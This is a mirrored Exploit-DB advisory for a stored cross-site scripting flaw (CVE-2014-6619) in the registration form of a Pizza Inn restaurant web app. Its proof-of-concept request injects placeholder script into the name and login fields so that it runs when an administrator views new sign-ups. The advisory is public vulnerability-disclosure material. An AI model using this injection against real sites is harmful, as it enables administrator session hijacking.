bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/34760.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

29 lines
No EOL
839 B
Text
Raw Blame History

Title: Pizza Inn Registration Stored XSS
Severity: High
CVE-ID: CVE-2014-6619
Release Date: 20 September 2014
Author: Kenneth F. Belva
Websites: http://silverbackventuresllc.com
http://xssWarrior.com
http://securitymaverick.com
Twitter: @infosecmaverick
Contact: Please use website contact form.
Mail:
URL: http://sourceforge.net/projects/restaurantmis/
Vendor:
Remote Exploit: Yes
Discovered with: xssWarrior - http://xssWarrior.com
Description:
============
On registration the XSS code will be stored in the database. When the administrator views the new sign-ups it will execute.
Proof of Concept :
==================
http://[domain]/PizzaInn/register-exec.php
fname=[code]&lname=[code]&login=[code]&password=r00t&cpassword=r00t&question=8&answer=hack4&Submit=Register
Reference in a new issue View git blame Copy permalink